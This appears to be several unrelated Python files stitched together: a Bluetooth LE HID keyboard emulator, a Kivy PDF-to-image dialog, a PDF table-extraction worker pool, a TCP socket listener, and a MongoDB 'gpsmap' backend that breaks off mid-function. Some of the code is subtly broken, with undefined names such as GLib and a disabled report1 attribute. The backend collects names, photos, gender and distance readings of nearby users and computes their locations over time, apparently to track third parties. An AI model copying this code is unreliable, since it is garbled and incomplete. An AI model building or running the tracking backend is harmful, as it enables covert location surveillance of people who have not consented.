from dbus.mainloop.glib import DBusGMainLoop
import os, sys, time, traceback, json, threading
import dbus, gattBridge
_mainloop = None
_keyboard = None
#name="Human Interface Device" sourceId="org.bluetooth.service.human_interface_device" type="primary" uuid="1812"
class HIDService(gattBridge.Service):
SERVICE_UUID = '1812'
def __init__(self, bus, index):
gattBridge.Service.__init__(self, bus, index, self.SERVICE_UUID, True)
self.report = ReportCharacteristic(bus, 0, self)
self.reportMap = ReportMapCharacteristic(bus, 1, self)
self.hidInfo = HIDInfoCharacteristic(bus, 2, self)
self.protocolMode = ProtocolModeCharacteristic(bus, 3, self)
self.controlPoint = ControlPointCharacteristic(bus, 4, self)
#self.report1 = Report1Characteristic(bus, 5, self)
self.add_characteristic(self.report)
self.add_characteristic(self.reportMap)
self.add_characteristic(self.hidInfo)
self.add_characteristic(self.protocolMode)
self.add_characteristic(self.controlPoint)
#self.add_characteristic(self.report1)
#id="report" name="Report" sourceId="org.bluetooth.characteristic.report" uuid="2A4D"
class ReportCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4D'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
['read', 'notify'],
service)
'''
<Field name="Report Value">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Repeated>true</Repeated>
</Field>
Use standard key codes: https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf
'''
self.add_descriptor(ReportReferenceDescriptor(bus, 1, self))
self.isConnected = False
self.value = [dbus.Byte(0x00),dbus.Byte(0x00)]
#print(f'***Report value***: {self.value}')
def sendKey(self, keyBytes, keyHold):
#send keyCode
print(f' \n***Send report keyCode: {[hex(x) for x in keyBytes]}, keyHold: {keyHold}***');
#if(self.isConnected == False): print('Abort Report2: Not connected to client'); return
self.PropertiesChanged(gattApplication.GATT_CHRC_IFACE, { 'Value': [dbus.Byte(keyBytes[0]),dbus.Byte(keyBytes[1])] }, [])
GLib.timeout_add(keyHold, self.sendNull)
def sendNull(self):
self.PropertiesChanged(gattApplication.GATT_CHRC_IFACE, { 'Value': [dbus.Byte(0x00),dbus.Byte(0x00)] }, [])
return False
def ReadValue(self, options):
print(f'Read Report: {self.value}')
return self.value
def StartNotify(self):
print(f' \n***CONNECTED: Report Data to Client')
self.isConnected = True
#GLib.timeout_add(15000, self.send)
def StopNotify(self):
print(f' \n***DISCONNECTED: Report Client')
self.isConnected = False
#type="org.bluetooth.descriptor.report_reference" uuid="2908"
class ReportReferenceDescriptor(gattBridge.Descriptor):
DESCRIPTOR_UUID = '2908'
def __init__(self, bus, index, characteristic):
gattBridge.Descriptor.__init__(
self, bus, index,
self.DESCRIPTOR_UUID,
['read'],
characteristic)
'''
<Field name="Report ID">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Minimum>0</Minimum>
<Maximum>255</Maximum>
</Field>
<Field name="Report Type">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Minimum>1</Minimum>
<Maximum>3</Maximum>
<Enumerations>
<Enumeration value="Input Report" key="1"/>
<Enumeration value="Output report" key="2"/>
<Enumeration value="Feature Report" key="3"/>
<ReservedForFutureUse start="4" end="255"/>
<ReservedForFutureUse1 start1="0" end1="0"/>
</Enumerations>
</Field>
'''
# This report uses ReportId 2 as defined in the ReportMap characteristic
self.value = dbus.Array(bytearray.fromhex('0201'), signature=dbus.Signature('y'))
#print(f'***ReportReference***: {self.value}')
def ReadValue(self, options):
print(f'Read ReportReference: {self.value}')
return self.value
#sourceId="org.bluetooth.characteristic.report_map" uuid="2A4B"
class ReportMapCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4B'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
['read'],
service)
'''
<Field name="Report Map Value">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Repeated>true</Repeated>
</Field>
HID Report Descriptors https://www.usb.org/sites/default/files/documents/hid1_11.pdf
HID Report Parser https://eleccelerator.com/usbdescreqparser/
'''
##############################################################################################
# This Report Descriptor defines 2 Input Reports
# ReportMap designed by HeadHodge
#
# <Report Layouts>
# <Report>
# <ReportId>1</ReportId>
# <Description>HID Keyboard Input</Description>
# <Example>KeyCode capital 'M' = [dbus.Byte(0x02), dbus.Byte(0x10)]</Example>
# <Field>
# <Name>Keyboard Modifier</Name>
# <Size>uint8</Size>
# <Format>
# <Bit0>Left CTRL Key Pressed</Bit0>
# <Bit1>Left SHIFT Key Pressed</Bit1>
# <Bit2>Left ALT Key Pressed</Bit2>
# <Bit3>Left CMD(Window) Key Pressed</Bit3>
# <Bit4>Right CTRL Key Pressed</Bit4>
# <Bit5>Right SHIFT Key Pressed</Bit5>
# <Bit6>Right ALT Key Pressed</Bit6>
# <Bit7>Right CMD(Window) Key Pressed</Bit7>
# </Format>
# </Field>
# <Field>
# <Name>Keyboard Input KeyCode</Name>
# <Size>uint8</Size>
# </Field>
# </Report>
# <Report>
# <ReportId>2</ReportId>
# <Description>HID Consumer Input</Description>
# <Example>KeyCode 'VolumeUp' = [dbus.Byte(0xe9), dbus.Byte(0x00)]</Example>
# <Field>
# <Name>Consumer Input KeyCode</Name>
# <Size>uint16</Size>
# </Field>
# </Report>
# </Report Layouts>
##############################################################################################
#USB HID Report Descriptor
self.value = dbus.Array(bytearray.fromhex('05010906a1018501050719e029e71500250175019508810295017508150025650507190029658100c0050C0901A101850275109501150126ff0719012Aff078100C0'))
self.isMapLoaded = False
#print(f'***ReportMap value***: {self.value}')
def ReadValue(self, options):
print(f'Read ReportMap: {self.value}')
self.isMapLoaded = True
return self.value
#id="hid_information" name="HID Information" sourceId="org.bluetooth.characteristic.hid_information" uuid="2A4A"
class HIDInfoCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4A'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
['read'],
service)
'''
<Field name="bcdHID">
<InformativeText>16-bit unsigned integer representing version number of base USB HID Specification implemented by HID Device</InformativeText>
<Requirement>Mandatory</Requirement>
<Format>uint16</Format>
</Field>
<Field name="bCountryCode">
<InformativeText>Identifies which country the hardware is localized for. Most hardware is not localized and thus this value would be zero (0).</InformativeText>
<Requirement>Mandatory</Requirement>
<Format>8bit</Format>
</Field>
<Field name="Flags">
<Requirement>Mandatory</Requirement>
<Format>8bit</Format>
<BitField>
<Bit index="0" size="1" name="RemoteWake">
<Enumerations>
<Enumeration key="0" value="The device is not designed to be capable of providing wake-up signal to a HID host"/>
<Enumeration key="1" value="The device is designed to be capable of providing wake-up signal to a HID host"/>
</Enumerations>
</Bit>
<Bit index="1" size="1" name="NormallyConnectable">
<Enumerations>
<Enumeration key="0" value="The device is not normally connectable"/>
<Enumeration key="1" value="The device is normally connectable"/>
</Enumerations>
</Bit>
<ReservedForFutureUse index="2" size="6"/>
</BitField>
</Field>
'''
self.value = dbus.Array(bytearray.fromhex('01110003'), signature=dbus.Signature('y'))
#print(f'***HIDInformation value***: {self.value}')
def ReadValue(self, options):
print(f'Read HIDInformation: {self.value}')
return self.value
#name="Protocol Mode" sourceId="org.bluetooth.characteristic.protocol_mode" uuid="2A4E"
class ProtocolModeCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4E'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
["read", "write-without-response"],
service)
'''
<Field name="Protocol Mode Value">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Enumerations>
<Enumeration key="0" value="Boot Protocol Mode"/>
<Enumeration key="1" value="Report Protocol Mode"/>
<ReservedForFutureUse start="2" end="255"/>
</Enumerations>
'''
#self.value = dbus.Array([1], signature=dbus.Signature('y'))
self.parent = service
self.value = dbus.Array(bytearray.fromhex('01'), signature=dbus.Signature('y'))
#print(f'***ProtocolMode value***: {self.value}')
def ReadValue(self, options):
print(f'Read ProtocolMode: {self.value}')
return self.value
def WriteValue(self, value, options):
print(f'Write ProtocolMode {value}')
self.value = value
#sourceId="org.bluetooth.characteristic.hid_control_point" uuid="2A4C"
class ControlPointCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4C'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
["write-without-response"],
service)
self.value = dbus.Array(bytearray.fromhex('00'), signature=dbus.Signature('y'))
#print(f'***ControlPoint value***: {self.value}')
def WriteValue(self, value, options):
print(f'Write ControlPoint {value}')
self.value = value
#############################################
def onConnectSignal(interface, changed, data=[]):
#############################################
if(changed.get("Connected", None) == None): return
print(f'****CONNECTION ALERT****, interface: {interface}, connected: {changed.get("Connected", 1)}')
#start advertising if not connected to host device
isConnected = btDevice.isConnected()
print(f'Host Device, isConnected: {isConnected}')
if(changed["Connected"] == True): return
return
####################################
async def receivedCommand(controlCommand):
####################################
try:
hidReport = controlCommand.get('hidReport', 1)
hidCode = controlCommand.get('hidCode', 0)
hidMod = controlCommand.get('hidMod', 0)
hidWait = controlCommand.get('hidWait', 0) * 1000
hidRepeat = controlCommand.get('hidRepeat', 0)
if(hidReport == 1):
#Transfer Keyboard Input
keyBytes = [hidMod, hidCode]
_keyboard.hidService.report1.sendKey(keyBytes, hidWait)
return
elif(hidReport == 2):
#Transfer Consumer Input
keyBytes = hidCode.to_bytes(2, byteorder='little')
_keyboard.services[0].report.sendKey(keyBytes, hidWait)
return
else:
print(f'Abort transfer, Invalid hidReport: {hidReport}')
except:
print('Abort transfer: ', sys.exc_info()[0])
traceback.print_exc()
####################################
def start(options={}):
####################################
try:
print("Start hidKeyboard")
global _mainloop, _keyboard
_keyboard = gattBridge.Application([HIDService])
#start advertising
#print(' \n***ADVERTISE: Host device not connected');
#os.system("hcitool -i hci0 cmd 0x08 0x0006 50 00 50 00 00 00 00 00 00 00 00 00 00 07 00")
#os.system("hcitool -i hci0 cmd 0x08 0x000a 01")
# Enable ConnectSignal
#threading.Thread(target=btDevice.enableConnectSignal, args=(onConnectSignal,)).start()
#btleDevice.enableConnectSignal(onConnectSignal)
#print(f'Connected: {btleDevice.isConnected()}')
#onConnectSignal('org.bluez.Device1', {'Connected': btDevice.isConnected()})
# Start btOutput event loop
#print('start hogKeyboard mainLoop')
_mainloop = GLib.MainLoop()
_mainloop.run()
except:
print('Abort hogKeyboard: ', sys.exc_info()[0])
traceback.print_exc()
##########################
# MAIN
##########################
if __name__ == '__main__':
start()
|
pdf.py
|
import threading
from functools import partial
from logging import getLogger
from os import makedirs
from pathlib import Path
import re
from subprocess import Popen, run, getstatusoutput, check_output
from sys import platform as _platform
from kivymd.toast import toast
from kivymd.uix.button import MDFlatButton
from kivymd.uix.dialog import MDDialog
from kivymd.uix.list import MDList, OneLineListItem, OneLineAvatarListItem
from kivymd.uix.textfield import MDTextField
from kivymd.uix.boxlayout import MDBoxLayout
from tesseractXplore.widgets import MyToggleButton
from tesseractXplore.app import alert, get_app
from tesseractXplore.constants import PDF_DIR
from tesseractXplore.widgets.lists import SwitchListItem
from kivymd.uix.progressbar import MDProgressBar
logger = getLogger().getChild(__name__)
def pdf_dialog(pdfpath,cmds):
# Called by image_glob.py
def close_dialog(instance, *args):
instance.parent.parent.parent.parent.dismiss()
layout = MDList()
pdfinfos = check_output([cmds["pdfimages"], "-list", pdfpath]).decode('utf-8')
pdfinfos = re.sub(r' +', ' ', pdfinfos)
pdfinfos = pdfinfos.split("\n")[2:-1]
pages = str(len(pdfinfos))
if pages != "0":
dpis = [pdfinfo.split(" ")[-3] for pdfinfo in pdfinfos]
from collections import Counter
dpi = Counter(dpis).most_common(1)[0][0]
else:
pdfinfos = check_output([cmds["pdfinfo"], pdfpath]).decode('utf-8')
pages = pdfinfos.split("\n")[9].split(": ")[-1].strip()
dpi = 300
layout.add_widget(OneLineListItem(text=f'The detected resolution is: {dpi}'))
layout.add_widget(OneLineListItem(text='First page'))
# id first
layout.add_widget(MDTextField(text="0", hint_text="First page", height=400))
layout.add_widget(OneLineListItem(text='Last page'))
# id last
layout.add_widget(MDTextField(text=pages, hint_text="Last page", height=400))
layout.add_widget(OneLineListItem(text='Imageformat (jpg, jp2, png, ppm(default), tiff)'))
# id = "fileformat"
boxlayout = MDBoxLayout(orientation="horizontal", adaptive_height=True)
boxlayout.add_widget(MyToggleButton(text="jpeg", group="imageformat"))
boxlayout.add_widget(MyToggleButton(text="jp2", group="imageformat"))
defaulttoggle = MyToggleButton(text="ppm", group="imageformat")
boxlayout.add_widget(defaulttoggle)
boxlayout.add_widget(MyToggleButton(text="png", group="imageformat"))
boxlayout.add_widget(MyToggleButton(text="tiff", group="imageformat"))
layout.add_widget(boxlayout)
layout.add_widget(OneLineListItem(text='Process to convert PDF to images'))
# id="converting",
boxlayout = MDBoxLayout(orientation="horizontal", adaptive_height=True)
boxlayout.add_widget(MyToggleButton(text="rendering", group="converting"))
defaulttoggle = MyToggleButton(text="extraction", group="converting")
boxlayout.add_widget(defaulttoggle)
layout.add_widget(boxlayout)
# id='include_pagenumber',
pagenumbers = OneLineAvatarListItem(text='Include page numbers in output file names')
# id = 'include_pagenumber_chk'
pagenumbers.add_widget(SwitchListItem())
layout.add_widget(pagenumbers)
dialog = MDDialog(title="Extract images from PDF",
type='custom',
auto_dismiss=False,
text=pdfpath,
content_cls=layout,
buttons=[
MDFlatButton(
text="CREATE IMAGES", on_release=partial(pdfimages_threading, pdfpath, cmds)
),
MDFlatButton(
text="VIEW PDF", on_release=partial(open_pdf, pdfpath)
),
MDFlatButton(
text="DISCARD", on_release=close_dialog
),
],
)
defaulttoggle.state = 'down'
dialog.content_cls.focused = True
dialog.open()
def pdfimages_threading(pdfpath, cmds, instance, *args):
instance.parent.parent.parent.parent.dismiss()
pdfimages_thread = threading.Thread(target=pdfimages, args=(pdfpath, cmds, instance, args))
pdfimages_thread.setDaemon(True)
pdfimages_thread.start()
def open_pdf(fname, *args):
""" Open a pdf via webbrowser or another external software """
pdfviewer = get_app().settings_controller.pdfviewer
if pdfviewer == 'webbrowser':
import webbrowser
webbrowser.open(str(Path(fname).absolute()))
else:
try:
run([pdfviewer, str(Path(fname).absolute())])
except:
alert(f"Couldn't find: {pdfviewer}")
pass
def pdfimages(pdfpath, cmds, instance, *args):
pb = MDProgressBar(color=get_app().theme_cls.primary_color, type="indeterminate")
status_bar = get_app().image_selection_controller.status_bar
status_bar.clear_widgets()
status_bar.add_widget(pb)
pb.start()
pdfdir = Path(pdfpath.split('.')[0])
makedirs(pdfdir, exist_ok=True)
params = []
children = instance.parent.parent.parent.parent.content_cls.children
process = cmds["pdfimages"]
for idx, child in enumerate(reversed(children)):
if idx == 6:
for fileformat in child.children:
if fileformat.state == 'down':
params.extend([f"-{fileformat.text}"])
if idx == 2 and child.text != "":
params.extend(["-f", child.text])
if idx == 4 and child.text != "":
params.extend(["-l", child.text])
if idx == 9 and child.ids['_left_container'].children[0].active:
params.extend(["-p"])
if idx == 8:
for convprocess in child.children:
if convprocess.state == 'down':
if convprocess.text == "rendering":
process = cmds["pdftoppm"]
else:
process = cmds["pdfimages"]
fileformat.text = "j" if fileformat.text == "jpeg" else fileformat.text
fileformat.text = "jpeg" if fileformat.text == "jp2" else fileformat.text
p1 = Popen([process, *params, pdfpath, pdfdir.joinpath(pdfdir.name)])
p1.communicate()
get_app().image_selection_controller.file_chooser._update_files()
get_app().image_selection_controller.add_images([pdfdir])
pb.stop()
def extract_pdf(pdfpath):
if _platform not in ["win32", "win64"]:
if getstatusoutput("pdfimages")[0] not in [1, 127]:
cmds ={"pdfimages":"pdfimages",
"pdfinfo":"pdfinfo",
"pdftoppm":"pdftoppm"}
pdf_dialog(pdfpath, cmds)
return pdfpath.split(".")[0]
else:
toast("Please install Poppler-utils to work convert PDFs to images with:")
toast("sudo apt-get install poppler-utils")
else:
pdftoolpath = Path(PDF_DIR)
if not pdftoolpath.exists():
# TODO: Don work atm properly and use the official site
try:
install_win(pdftoolpath)
except:
logger.info(f'Download: Error while downloading')
return
binpath = list(pdftoolpath.glob("./**/**/bin"))[0]
cmds = {"pdfimages": str(binpath.joinpath("pdfimages.exe").absolute()),
"pdfinfo": str(binpath.joinpath("pdfinfo.exe").absolute()),
"pdftoppm": str(binpath.joinpath("pdftoppm.exe").absolute())}
pdf_dialog(pdfpath,cmds)
return pdfpath
def install_win(pdftoolpath):
import requests, zipfile, io
url = 'https://digi.bib.uni-mannheim.de/~jkamlah/poppler-0.68.0_x86.zip'
#url = 'http://blog.alivate.com.au/wp-content/uploads/2018/10/poppler-0.68.0_x86.7z'
r = requests.get(url, stream=True)
pdftoolpath.mkdir(parents=True)
z = zipfile.ZipFile(io.BytesIO(r.content))
z.extractall(str(pdftoolpath.absolute()))
toast('Download: Poppler succesful')
logger.info(f'Download: Succesful')
|
pdf_reader.py
|
from multiprocessing import JoinableQueue, Process, Queue, Value
import camelot
import fitz
import pandas as pd
from PIL import Image, ImageDraw
from .bar_utils import ProcessBar
from .database import Job, db
from .utils import simple_job
ZOOM_FACTOR = 4.166106501051772
def blocks_without_table(blocks, table_bbox):
blocks = [
(
block[0] * ZOOM_FACTOR,
block[1] * ZOOM_FACTOR,
block[2] * ZOOM_FACTOR,
block[3] * ZOOM_FACTOR,
block[4],
block[5],
block[6],
)
for block in blocks
]
rects = [
fitz.Rect(table_pos[0], table_pos[1], table_pos[2], table_pos[3])
for table_pos in table_bbox.keys()
]
blocks = [
block
for block in blocks
if all(map(lambda rect: fitz.Rect(block[:4]) not in rect, rects))
]
return blocks
def extract_pdf(job, debug):
if debug:
print(job.id, "start")
tables = camelot.read_pdf(
job.path,
pages="all",
split_text=True,
)
# https://stackoverflow.com/questions/58837504/camelot-pdf-extraction-fail-parsing
# print(pd.concat([table.df for table in tables]).to_string())
img_array, table_bbox = tables[0]._image
doc = fitz.open(job.path)
page = doc[0]
blocks = blocks_without_table(
page.getTextPage().extractBLOCKS(), table_bbox
) # faster than page.getText("blocks")
# for block in blocks:
# print(block[4])
img = Image.fromarray(img_array, "RGB")
draw = ImageDraw.Draw(img)
for block in blocks + list(table_bbox):
draw.rectangle(
(block[0], block[1], block[2], block[3]),
outline=(255, 0, 0),
width=3,
)
if debug:
print(job.id, "end")
def process_job(workers, queue, db_queue, debug):
while True:
job = queue.get()
workers.do()
extract_pdf(job, debug)
workers.end()
job.status = 2
db_queue.put(job)
queue.task_done()
class Workers:
def __init__(self, workers_cnt, queue, db_queue, debug):
self.workers = []
self.pending = Value("i", 0)
self.cnt = Value("i", 0)
for _ in range(workers_cnt):
worker = Process(
target=process_job, args=(self, queue, db_queue, debug)
)
worker.daemon = True
worker.start()
self.workers.append(worker)
def do(self):
self.pending.value += 1
def end(self):
self.cnt.value += 1
self.pending.value -= 1
def __len__(self):
return len(self.workers)
def pdf_workers(workers_count=2, debug=True, files=0):
if db.is_closed():
db.connect()
additional = Job.select().where(Job.status == 1).count()
Job.update(status=0).where(Job.status == 1).execute()
progress_bar = ProcessBar(additional + files, debug=files != 0)
queue = JoinableQueue()
db_queue = Queue()
workers = Workers(workers_count, queue, db_queue, files == 0)
while True:
if files != 0 and Job.select().where(Job.status != 2).count() == 0:
break
progress_bar.update((workers.cnt.value - progress_bar.value))
if not db_queue.empty():
jobs = []
while not db_queue.empty():
jobs.append(db_queue.get())
with db.atomic():
Job.bulk_update(jobs, fields=["status"], batch_size=100)
elif workers_count - queue.qsize() > 0:
additional_jobs = min(
Job.select().where(Job.status == 0).count(),
len(workers) - workers.pending.value,
)
if additional_jobs == 0:
continue
jobs = []
for job in (
Job.select()
.where(Job.status == 0)
.paginate(1, additional_jobs)
):
job.status = 1
jobs.append(job)
with db.atomic():
Job.bulk_update(jobs, fields=["status"], batch_size=100)
for job in jobs:
queue.put(job)
queue.join()
db.close()
|
__main__.py
|
import socket
import argparse
import time
from threading import Thread
from acceptor import listenForClients
# Do argument work
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--port", default=6060)
args = ap.parse_args()
# Deal with type conversions
args.port = int(args.port)
# Start up master socket
sessions = []
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("0.0.0.0", args.port))
sock.listen(1)
# Listen for clients in a thread
print("Started listener")
client_listener = Thread(target=listenForClients, args=[sock])
client_listener.start()
while True:
time.sleep(1)
|
backend.py
|
import pymongo
import datetime
import json
import Queue
import threading
import time
import calc_postion
from pprint import pprint
import md5
from baselib import error_print
global_db_name = "gpsmap"
global_db_url = "mongodb://gpsmap:gpsmap@127.0.0.1:27017/"+global_db_name
global_db_origin_collection = "origin"
global_db_calc_collection = "calc"
global_db_user_collection = "userextern"
global_db_device_collection = "device"
global_key_la = "latitude"
global_key_lo = "longitude"
global_key_list = "items"
global_key_sendtime = "sendtime"
global_key_uid = "id"
global_key_dis = "distance"
global_key_name = "name"
global_key_img = "img"
global_key_gender = "gender"
global_key_device = "device"
global_default_base_time = datetime.datetime(1970,1,1,0,0,0,0)
global_default_uint_time = 60 * 10
global_care_keys = [global_key_la, global_key_lo, global_key_list, global_key_sendtime]
global_origin_keys = [global_key_uid, global_key_la, global_key_lo, global_key_sendtime, global_key_dis]
'''
origin:
_id: obj()
loc:
type: "Point"
coordinates: []
distance: "300"
sendtime: "2016-01-01 01:01:01"
time: "2016-01-01 01:01:01"
id : "string"
calc:
_id: obj()
id: "string"
time: "2016-01-01 01:01:01"
loc:
type: "Point"
coordinates: []
distance: "300"
level: 0 unused
1 High
...
5 Low
'''
def md5String(s):
try:
s = s.encode(encoding="utf-8")
return md5.new(s).hexdigest()
except Exception as e:
error_print(e)
return None
def CreateUID(obj):
'''
change to use name md5
'''
## global_key_uid
## global_key_img
md5key_list = [global_key_name]
try:
m = md5.new()
ret = ""
for key in md5key_list:
if key not in obj:
return obj[global_key_uid]
value = obj[key].encode(encoding="utf-8")
m.update(value)
ret += "{0:04d}".format(len(value))
ret_m = m.hexdigest()
if not ret_m:
return obj[global_key_uid]
return ret + ret_m
except Exception as e:
error_print(e)
return None
"""
origin :
{
"id", "time", "sendtime", "distance",
"loc": { type: "Point", coordinates: [ 40, 5 ] }
}
{
"id" : 1
"time" : -1
"loc" : "2dsphere"
}
userextern
{
"id": 1
"time": -1
}
calc
{
"id": 1
"loc": "2dsphere"
"distance":
"time": -1
}
device
{
"device": 1
"loc" : "2dsphere"
"time": -1
}
"""
global_timedelta = datetime.timedelta(minutes=5)
global_calc_timedelta = datetime.timedelta(minutes=1)
global_EP = 50
global_timeformat_string = "%Y-%m-%d %H:%M:%S"
global_timeformat_string_minutes = "%Y-%m-%d %H:%M"
def time_format(date):
return date.strftime(global_timeformat_string)
def string_to_time(s):
try:
return datetime.datetime.strptime(s, global_timeformat_string)
except Exception as e:
return None
def string_standard(s):
try:
return time_format(string_to_time(s))
except Exception as e:
return None
def time_now():
return time_format( datetime.datetime.now() )
def string_time_to_unit(start, check, tunit):
try:
c = string_to_time(check)
d = c - start
ret = d.total_seconds() / tunit
return int(ret)
except Exception as e:
return None
def string_min_whole(s, start, tunit):
de = datetime.timedelta(seconds = s * tunit)
return time_format(start + de)
def fretch_gps_from_data(data):
try:
return data["loc"]["coordinates"][1], data["loc"]["coordinates"][0], int(data["distance"])
except Exception as e:
return None, None, None
class opt():
def __init__(self):
self.connect = pymongo.MongoClient(global_db_url)
self.queue = Queue.Queue()
self.mutex = threading.Lock()
self.thread = None
def Start_Calc_Thread(self):
if self.mutex.acquire():
if not self.thread or not self.thread.is_alive():
self.thread = None
self.thread = threading.Thread(target=self.ThreadCore)
self.thread.start()
self.mutex.release()
def ThreadCore(self):
print("In Core.")
while not self.queue.empty():
try:
ids = self.queue.get(False)
print("Check ids {0}.".format(len(ids)))
n = self.calc_list_id(ids)
print("Update ids {0}.".format(n))
n = self.UpdateUser(ids)
print("Update users {0}.".format(n))
except Exception as e:
break
print("Quit Core.")
def producer(self, data):
# self.queue.put(data)
# return true
obj = self.produce_obj(data)
if not obj:
return None
if global_key_la not in obj or global_key_lo not in obj or global_key_list not in obj:
return None
return self.producer_action(obj)
def producer_action(self, obj):
try:
count = self.produce_bulk(obj, global_db_origin_collection, global_db_user_collection )
return count
except Exception as e:
error_print(e)
print(obj)
pass
return None
def produce_obj(self, data):
try:
obj = json.loads(data)
return obj
except Exception as e:
error_print(e)
return None
def produce_bulk(self, obj, opoints, users):
if not obj:
return None
db = self.connect.get_database(global_db_name)
o_coll = db.get_collection(opoints)
u_coll = db.get_collection(users)
o_bulk = o_coll.initialize_unordered_bulk_op()
u_bulk = u_coll.initialize_unordered_bulk_op()
ids = set()
for origin in self.parser_obj(obj):
data = self.produce_insert_origin(origin)
if not data:
continue
o_bulk.insert( data )
ids.add(data[global_key_uid])
f, d = self.produce_update_user(origin)
if not f or not d:
continue
u_bulk.find(f).upsert().update(d)
self.start_calc_ids(list(ids))
result = o_bulk.execute()
count = result['nInserted']
result = u_bulk.execute()
# count = result['nUpserted'] + result['nModified']
return count > 0
def produce_insert_origin(self, origin):
try:
for n in global_origin_keys:
if n not in origin:
return None
data = {}
data[global_key_uid] = str(origin[global_key_uid])
data[global_key_dis] = str(origin[global_key_dis])
data[global_key_sendtime] = str(origin[global_key_sendtime])
data["loc"] = { "type": "Point", "coordinates": [ float(origin[global_key_lo]), float(origin[global_key_la]) ] }
data["time"] = time_now()
return data
except Exception as e:
pass
return None
def produce_update_user(self, origin):
try:
data = origin.copy()
for key in global_origin_keys[1:]:
if key in data:
del data[key]
data["time"] = time_now()
f = {global_key_uid: data[global_key_uid]}
d = {}
if "device" in data:
d["$addToSet"] = {"device": data["device"]}
del data["device"]
d["$set"] = data
d["$inc"] = {"ocount": 1}
return f, d
except Exception as e:
pass
return None, None
def standardize_data(self, origin):
if "sex" in origin:
value = int(origin["sex"])
del origin["sex"]
try:
if value == 1:
origin[global_key_gender] = "male"
elif value == 2:
origin[global_key_gender] = "female"
else:
origin[global_key_gender] = "none"
except Exception as e:
origin[global_key_gender] = "none"
return origin
def parser_obj(self, obj):
for key in global_care_keys:
if key not in obj:
return
if not obj[global_key_list]:
return
unique = {}
unique[global_key_sendtime] = obj[global_key_sendtime]
unique[global_key_la] = obj[global_key_la]
unique[global_key_lo] = obj[global_key_lo]
if global_key_device in obj:
unique[global_key_device] = obj[global_key_device]
for one in obj[global_key_list]:
if global_key_dis not in one:
continue
uid = CreateUID(one)
if not uid:
continue
ret = unique.copy()
ret.update(one)
ret[global_key_uid] = uid
yield self.standardize_data(ret)
def get_origin_points_data_from_db(self, i, start, end):
f = {"id": i}
c = {"_id": 0, "loc.coordinates":1, "time":1, "distance":1}
ret = []
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_calc_collection)
if start:
f["time"] = {}
f["time"]["$gte"] = start
if end:
if "time" not in f:
f["time"] = {}
f["time"]["$lte"] = end
origin_collection = db.get_collection(global_db_origin_collection)
r = origin_collection.find(f, c).sort("time", pymongo.ASCENDING)
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return ret
def cut_list_by_time(self, data, tunit):
origin_list = {}
base_time = global_default_base_time
sorted(data, key=lambda x: x["time"])
for d in data:
if not d:
continue
try:
minutes = string_time_to_unit(base_time, d["time"], tunit)
if minutes is None:
continue
if minutes not in origin_list:
origin_list[minutes] = []
origin_list[minutes].append(d)
except Exception as e:
continue
return origin_list, base_time
def check_and_calc_with_data(self, data, tunit, id):
try:
tunit = int(tunit)
except Exception as e:
tunit = global_default_uint_time
dic_data, base_time = self.cut_list_by_time(data, tunit)
if not dic_data:
return None
new_ret = {}
for minutes in dic_data:
key = string_min_whole(minutes + 1, base_time, tunit)
r = self.zone_and_calc(dic_data[minutes], id, key)
new_ret[key] = r
return new_ret
def translate_calc_to_ui(self, new_ret, i):
ret = []
for key in new_ret:
if not new_ret[key]:
continue
d = new_ret[key]
ret.append({global_key_uid: i,
"time": d["time"],
"latitude": d["loc"]["coordinates"][1],
"longitude": d["loc"]["coordinates"][0],
"distance": d["distance"]
})
return ret
def check_and_calc(self, i, start, end, tunit):
data = self.get_origin_points_data_from_db(i, start, end)
if not data:
return None
ret = self.check_and_calc_with_data(data, tunit, i)
if not ret:
return None
return self.translate_calc_to_ui(ret, i)
def zone_and_calc(self, l, i, tm):
if len(l) < 3:
return None
r = calc_postion.calc_list(l, global_EP, fretch_gps_from_data)
if r:
ret = {}
ret[global_key_uid] = i
ret["loc"] = {"type": "Point", "coordinates" : [r[1], r[0]]}
ret["distance"] = r[2]
ret["time"] = tm
ret["level"] = r[3]
return ret
return None
def start_calc_ids(self, ids):
# push in Queue
# in no threading
# start threading
if not ids:
return
self.queue.put(ids)
self.Start_Calc_Thread()
def calc_list_id(self, ids):
tunit = global_default_uint_time
db = self.connect.get_database(global_db_name)
u_coll = db.get_collection(global_db_calc_collection)
u_bulk = u_coll.initialize_unordered_bulk_op()
count = 0
for i in ids:
if not i:
continue
ret = self.calc_one_id(i, u_coll, u_bulk, tunit)
if ret:
count += ret
if count > 0:
try:
result = u_bulk.execute()
count = result['nUpserted'] + result['nModified']
return count
except Exception as e:
error_print(e)
return None
def calc_one_id(self, i, u_coll, u_bulk, tunit):
last_time = None
try:
it = u_coll.find({global_key_uid: i}, {"_id":0, "time": 1}).sort("time", pymongo.DESCENDING).limit(1)
for one in it:
last_time = one["time"]
except Exception as e:
return None
data = self.get_origin_points_data_from_db(i, last_time, None)
if not data or len(data) < 3:
return None
ret = self.check_and_calc_with_data(data, tunit, i)
try:
max = len(ret)
count = 0
for key in ret:
count += 1
d = ret[key]
f = {global_key_uid: i, "level": 0, "time": key}
if not d:
if count >= max: ## In the last time zone, We won't insert None to db
count -= 1
break
d = f
